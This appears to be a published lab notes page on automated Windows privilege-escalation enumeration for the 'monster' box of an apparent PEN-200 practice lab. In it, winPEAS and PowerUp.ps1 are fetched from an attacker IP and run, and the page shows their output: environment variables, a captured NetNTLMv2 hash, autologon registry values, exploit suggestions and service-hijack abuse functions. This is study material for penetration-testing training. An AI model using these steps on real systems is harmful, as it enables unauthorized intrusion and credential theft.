PEAS

Conducting an automated enumeration after performing a manual enumeration

PS C:\xampp\htdocs\blog> mkdir C:\tmp ; cd C:\tmp ; iwr -Uri http://192.168.45.249/winPEASany.exe -OutFile C:\tmp\winPEASany.exe
 
    Directory: C:\
 
 
Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----         4/18/2025  12:35 PM                tmp

Delivery complete

Executing PEAS

ENV

����������͹ User Environment Variables
� Check for some passwords or keys in the env variables 
    COMPUTERNAME: MIKE-PC
    PSExecutionPolicyPreference: Bypass
    HOMEPATH: \Users\Mike
    LOCALAPPDATA: C:\Users\Mike\AppData\Local
    PSModulePath: C:\Users\Mike\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
    PROCESSOR_ARCHITECTURE: AMD64
    Path: C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Users\Mike\AppData\Local\Microsoft\WindowsApps;
    CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
    ProgramFiles(x86): C:\Program Files (x86)
    PROCESSOR_LEVEL: 25
    LOGONSERVER: \\MIKE-PC
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
    HOMEDRIVE: C:
    SystemRoot: C:\WINDOWS
    SESSIONNAME: Console
    ALLUSERSPROFILE: C:\ProgramData
    DriverData: C:\Windows\System32\Drivers\DriverData
    USERPROFILE: C:\Users\Mike
    AP_PARENT_PID: 6108
    APPDATA: C:\Users\Mike\AppData\Roaming
    PROCESSOR_REVISION: 0101
    USERNAME: Mike
    CommonProgramW6432: C:\Program Files\Common Files
    OneDrive: C:\Users\Mike\OneDrive
    CommonProgramFiles: C:\Program Files\Common Files
    OS: Windows_NT
    USERDOMAIN_ROAMINGPROFILE: MIKE-PC
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    ComSpec: C:\WINDOWS\system32\cmd.exe
    PROMPT: $P$G
    SystemDrive: C:
    TEMP: C:\Users\Mike\AppData\Local\Temp
    ProgramFiles: C:\Program Files
    NUMBER_OF_PROCESSORS: 2
    TMP: C:\Users\Mike\AppData\Local\Temp
    ProgramData: C:\ProgramData
    ProgramW6432: C:\Program Files
    windir: C:\WINDOWS
    USERDOMAIN: MIKE-PC
    PUBLIC: C:\Users\Public
 
����������͹ System Environment Variables
� Check for some passwords or keys in the env variables 
    ComSpec: C:\WINDOWS\system32\cmd.exe
    DriverData: C:\Windows\System32\Drivers\DriverData
    OS: Windows_NT
    Path: C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
    PROCESSOR_ARCHITECTURE: AMD64
    PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
    TEMP: C:\WINDOWS\TEMP
    TMP: C:\WINDOWS\TEMP
    USERNAME: SYSTEM
    windir: C:\WINDOWS
    NUMBER_OF_PROCESSORS: 2
    PROCESSOR_LEVEL: 25
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    PROCESSOR_REVISION: 0101

N/A

PowerShell

PS C:\tmp> cat C:\Users\Mike\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Restart-Computer

NTLM

Mike::MIKE-PC:1122334455667788:6abd2ff4f31c852f7d0cfa77ae15c477:0101000000000000a4c0d23399b0db01ff3e5be0f958ca6b0000000008003000300000000000000000000000002000005745f0b31ec1924f045f0bc19ce18ddc9bbb8d3fd6dce763e75f3e1f7c01d0470a00100000000000000000000000000000000000090000000000000000000000

.NET

Token Privileges (`mike`)

Enumerated

RDP Session

AutoLogon

PS C:\tmp> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    DisableBackButton    REG_DWORD    0x1
    EnableSIHostIntegration    REG_DWORD    0x1
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ    
    LegalNoticeText    REG_SZ    
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    ShellCritical    REG_DWORD    0x0
    ShellInfrastructure    REG_SZ    sihost.exe
    SiHostCritical    REG_DWORD    0x0
    SiHostReadyTimeOut    REG_DWORD    0x0
    SiHostRestartCountLimit    REG_DWORD    0x0
    SiHostRestartTimeGap    REG_DWORD    0x0
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    WinStationsDisabled    REG_SZ    0
    scremoveoption    REG_SZ    0
    LastLogOffEndTimePerfCounter    REG_QWORD    0x3387c2fe7
    ShutdownFlags    REG_DWORD    0x80000027
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    DisableCad    REG_DWORD    0x1
    DisableLockWorkstation    REG_DWORD    0x0
    EnableFirstLogonAnimation    REG_DWORD    0x1
    AutoLogonSID    REG_SZ    S-1-5-21-2619112490-2635448554-1147358759-1002
    LastUsedUsername    REG_SZ    Mike
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    Mike
    DefaultDomainName    REG_SZ    DESKTOP-8OB2COP
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKey

Processes

Modifiable Services

Interesting Files

WESNG

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/monster]
└─$ wes --update ; wes sysinfo --exploits-only --hide "Internet Explorer" Edge Flash 
WARNING:root:chardet module not installed. In case of encoding errors, install chardet using: pip3 install chardet
Windows Exploit Suggester 1.03 ( https://github.com/bitsadmin/wesng/ )
[+] Updating definitions
[+] Obtained definitions created at 20250418
WARNING:root:chardet module not installed. In case of encoding errors, install chardet using: pip3 install chardet
Windows Exploit Suggester 1.03 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
    - Name: Windows 10 Version 21H2 for x64-based Systems
    - Generation: 10
    - Build: 19044
    - Version: 21H2
    - Architecture: x64-based
    - Installed hotfixes (8): KB5012117, KB4562830, KB4580325, KB5003791, KB5012599, KB5011352, KB5011651, KB5005699
[+] Loading definitions
    - Creation date of definitions: 20250418
[+] Determining missing patches
[+] Applying display filters
[!] Found vulnerabilities!
 
Date: 20231114
CVE: CVE-2023-38039
KB: KB
Title: Hackerone: CVE-2023-38039 HTTP headers eat all memory
Affected product: Windows 10 Version 21H2 for x64-based Systems
Affected component: Windows cURL Implementation
Severity: Low
Impact: Denial of Service
Exploits: https://hackerone.com/reports/2072338, https://hackerone.com/reports/2072338
 
Date: 20250415
CVE: CVE-2023-44487
KB: KB
Title: MITRE: CVE-2023-44487 HTTP/2 Rapid Reset Attack
Affected product: Windows 10 Version 21H2 for x64-based Systems
Affected component: HTTP/2
Severity: Important
Impact: Denial of Service
Exploits: https://github.com/micrictor/http2-rst-stream, https://github.com/micrictor/http2-rst-stream, https://security.netapp.com/advisory/ntap-20240621-0006/, https://security.netapp.com/advisory/ntap-20240621-0006/
 
[-] Missing patches: 1
    - KB: patches 2 vulnerabilities
[I] KB with the most recent release date
    - ID: KB
    - Release date: 20250415
[+] Done. Displaying 2 of the 774 vulnerabilities found.

PowerUp.ps1

PS C:\tmp> iwr -Uri http://192.168.45.249/PowerUp.ps1 -OutFile .\PowerUp.ps1
PS C:\tmp> . .\PowerUp.ps1
PS C:\tmp> Invoke-AllChecks
 
 
ServiceName                     : edgeupdate
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
ModifiableFile                  : C:\
ModifiableFilePermissions       : AppendData/AddSubdirectory
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdate'
CanRestart                      : False
Name                            : edgeupdate
Check                           : Modifiable Service Files
 
ServiceName                     : edgeupdate
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Delete, GenericWrite, GenericExecute, GenericRead}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdate'
CanRestart                      : False
Name                            : edgeupdate
Check                           : Modifiable Service Files
 
ServiceName                     : edgeupdatem
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
ModifiableFile                  : C:\
ModifiableFilePermissions       : AppendData/AddSubdirectory
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdatem'
CanRestart                      : False
Name                            : edgeupdatem
Check                           : Modifiable Service Files
 
ServiceName                     : edgeupdatem
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Delete, GenericWrite, GenericExecute, GenericRead}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdatem'
CanRestart                      : False
Name                            : edgeupdatem
Check                           : Modifiable Service Files
 
ModifiablePath    : C:\Users\Mike\AppData\Local\Microsoft\WindowsApps
IdentityReference : MIKE-PC\Mike
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\Mike\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\Mike\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\Mike\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'
 
DefaultDomainName    : DESKTOP-8OB2COP
DefaultUserName      : Mike
DefaultPassword      :
AltDefaultDomainName :
AltDefaultUserName   :
AltDefaultPassword   :
Check                : Registry Autologons

InfoSec LAB

Explorer

Monster_Automated

PEAS

ENV

N/A

PowerShell

NTLM

.NET

Token Privileges (`mike`)

RDP Session

AutoLogon

Processes

Modifiable Services

Interesting Files

WESNG

PowerUp.ps1

Interactive Graph View

Table of Contents

Backlinks

InfoSec LAB

Explorer

Monster_Automated

PEAS

ENV

N/A

PowerShell

NTLM

.NET

Token Privileges (mike)

RDP Session

AutoLogon

Processes

Modifiable Services

Interesting Files

WESNG

PowerUp.ps1

Interactive Graph View

Table of Contents

Backlinks

Token Privileges (`mike`)